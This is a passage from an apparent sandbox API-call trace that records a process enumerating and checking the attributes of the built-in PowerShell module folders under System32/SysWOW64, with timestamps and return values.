lpOldMode=0x5a0e60c) returned 1 [0157.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x33 [0157.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x33, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0157.806] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.807] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.807] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0157.807] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0157.807] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0157.807] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0157.807] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0157.807] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0157.807] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0157.808] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0157.809] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0157.809] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0157.809] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0157.809] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0157.809] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0157.809] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0157.809] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0157.809] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.809] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.810] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0157.810] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0157.810] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0157.810] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0157.810] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0157.810] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0157.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0157.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0157.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.811] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0157.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0157.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0157.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.811] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0157.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0157.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.812] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0157.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0157.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.812] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0157.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0157.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.813] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0157.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0157.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.814] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0157.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0157.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.814] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0157.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0157.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.815] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0157.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0157.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0157.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.815] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0157.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0157.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, 